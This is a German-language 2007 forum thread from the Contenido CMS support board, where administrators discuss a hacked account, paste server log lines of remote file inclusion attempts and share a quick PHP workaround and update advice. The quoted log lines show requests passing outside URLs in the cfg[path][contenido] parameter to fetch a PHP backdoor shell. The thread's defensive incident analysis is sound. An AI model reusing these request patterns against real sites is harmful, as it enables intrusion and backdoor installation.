CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

Exploit für Contenido im umlauf?

https://forum.contenido.org/viewtopic.php?f=108&t=17051

Seite 1 von 1

Exploit für Contenido im umlauf?

Verfasst: So 13. Mai 2007, 16:00
von tty7
Folgende oder ähnliche einträge finden sich einige in den Logs eins gehackten Kunden Account. Das Script was hier eingebunden wird ist ein bekanntes backdoor php shell.
Bitte um Aufklärung über dieses Problem. Die Contenido Version "in question" ist 4.6.4.
Handelt es sich hier bei um etwas beaknntes oder ist das neu?
Dankeschön.

69.93.188.250 - - [11/May/2007:17:34:24 +0200] "GET /cms//contenido/conlib/local.php?cfg[path][contenido]=http://www.chrisvalk.com/1/headstones/h?? HTTP/1.1" 404 1578 "-" "libwww-perl/5.805"

Verfasst: So 13. Mai 2007, 16:10
von MichFress
soweit ich weiß, ist das wieder dasselbe. Du solltest dringend auf das aktuelle 4.6.15 updaten, die älteren 4.6.* waren etwas buggy und unsicher. Nähere Informationen findest du aber hier im Forum.

Verfasst: So 13. Mai 2007, 16:15
von tty7
Wieder das selbe? Ok wenn es bekannt ist, gut dieser exploit liegt anscheinet momentan bei den scan-hit-and-run attacken recht weit oben auf der Liste der Kids.

4 Exploits bisher bei alter Version

Verfasst: So 13. Mai 2007, 18:50
von stefan25376
Hallo tty7,

Auf einem meiner Server läuft ein altes Contenido 4.4.5. Irgendwelche Script-Kiddies sind da auch immer schwer zugange. Mit folgenden Dateien sind bei mir bisher Code-Injections probiert worden:

Code: Alles auswählen

/conlib/local.php
/contenido/classes/class.inuse.php
/contenido/classes/class.htmlelements.php
/contenido/includes/include.logs.php
Das ist in diesem Forum schon einmal in einem früheren Post erläutert worden. Hier noch einmal ein Workaround "quick and dirty":

In die ersten Zeilen der Dateien einfach folgende Zeilen einfügen:

Code: Alles auswählen

if ($_GET["cfg"] || $_POST["cfg"])
{
	die();
}

Verfasst: Fr 18. Mai 2007, 18:58
von tty7
Folgender exploit scheint für 4.6.4 valide zu sein:

88.198.175.78 - - [18/May/2007:15:36:42 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
216.224.124.124 - - [18/May/2007:15:51:58 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.0" 200 16654 "-" "Mozilla 8.0"
64.251.15.140 - - [18/May/2007:15:55:37 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 35114 "-" "Mozilla 8.0"
88.191.51.214 - - [18/May/2007:16:46:23 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"

installiert wird von den Jungs ein iroffer bot mit haufenweise italenischen Filmen. Gleich mal ein paar abuse mail loswerden und dann beobachten. Contenido ist jetzt up to date, mal sehn ob noch was passiert.

Verfasst: Fr 18. Mai 2007, 20:00
von wosch
Da wird versucht auf eine gleiche Methode zu installieren:
http://www.contenido.de/forum/viewtopic.php?p=101192


Das Script bei dir ist uralt (und nur mässig programmiert), von Ende 2005 / Anfang 2006

Du solltst aber auch deine eigene Inhalte gründlich prüfen,
das Script kann auch "Hintertürchen öffnen" und weitere Scripte auf deinem Webspace für ein BotNet installieren.

Auch deinen Provider solltest du informieren das er seinen Server gründlich checkt auf "ungebetene Gäste".

Ein Update auf 4.6.8.15 wäre in dem Zusammenhang dringend anzuraten.

Verfasst: Fr 18. Mai 2007, 20:03
von Dodger77
tty7 hat geschrieben:Folgender exploit scheint für 4.6.4 valide zu sein:

88.198.175.78 - - [18/May/2007:15:36:42 +0200] "POST //contenido/external/frontend/news.php?cfg[path][contenido]=http://lojatelan.com.br/slcache/osx-sux.jpg? HTTP/1.1" 200 13032 "-" "Mozilla 8.0"
Nein, nur für die 4.4.x; die Datei "news.php" ist in der 4.6.x nicht mehr drin. Das kann evtl. ein Überbleibsel von einem Update sein.

Verfasst: Fr 18. Mai 2007, 20:27
von wosch
Dodger77,

nur so unausgegoren (ohne endgültige Konsequenz) mal überlegt.
Bei einem Update von 4.4.x auf 4.6.x hätte ja die news.php keinen praktischen Wert mehr.
Wäre es nicht sinnvoll solche "alten" und nicht mehr benötigten Dateien zu "entschärfen" (wie auch immer)?
Was macht ein Update aus Sicherheitsgründen einen Sinn wenn noch Reste der alten Dateien im System bleiben und weiterhin "angreifbar" sind.

Verfasst: Fr 18. Mai 2007, 20:59
von Dodger77
Verschoben. Für den Fall eines Upgrades von einer 4.4.x auf eine 4.6.x würde eine leere "news.php" IMO durchaus Sinn machen.

Verfasst: So 20. Mai 2007, 22:13
von tty7
Oh so ist das file eifnach beim update übrig geblieben? Auch nett, den wenn man sich die Logs der Angriffe anschaut scannen die Kids anscheind nach solchen fällen. Es werden diverse files probiert, wären sie nur auf die alten aus würde so ein vorgehen ja kaum sinn machen. Hier sollte man sich vieleciht mal was überlegen. Letzenendes kann man aktuell sein und trotzdem verwundbar durch solche alten Tretmienen.

Verfasst: Mo 28. Mai 2007, 19:24
von HerrB
Es ist praktisch unmöglich, alle weggefallenen Dazeien zu tracken und für den Fall der Fälle als leere Dateien mitzuschleifen.

Hinweis in der readme.txt zum Update ergänzt.

Closed.

Gruß
HerrB
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de